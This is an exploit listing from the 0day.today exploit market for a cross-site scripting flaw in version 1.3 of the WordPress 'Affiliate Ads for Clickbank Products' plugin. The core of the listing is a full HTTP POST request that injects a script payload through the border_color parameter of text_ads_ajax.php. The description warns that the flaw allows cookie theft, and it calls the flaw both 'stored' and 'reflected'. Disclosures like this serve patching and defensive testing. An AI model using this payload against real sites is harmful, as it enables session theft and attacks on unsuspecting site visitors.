[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress Affiliate Ads For Clickbank Products 1.3 XSS Vulnerability

Author
Ricardo Sanchez
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-28995
Category
web applications
Date add
15-11-2017
Platform
php
Credit Ricardo Sanchez
Vulnerable Affiliate Ads for Clickbank Products Plugin 1.3

Affiliate Ads for Clickbank Products Plugin is prone to a stored cross-site
scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:


Demo Request POST:

POST /wordpress/wp-content/plugins/affiliate-ads-builder-for-
clickbank-products/text_ads_ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,
image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.9
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 227

show_product_descr=1&show_read_more_btn=1&default_font_
family=1&fill_color=1&border_color="><script>alert("XSS")</
script>&link_color=2&kws=1&cols=1&rows=1&ref=1&descr_
color=1&height_adjustmen=1&hide_footer=2&height_adjustment=1

#  0day.today [2024-11-15]  #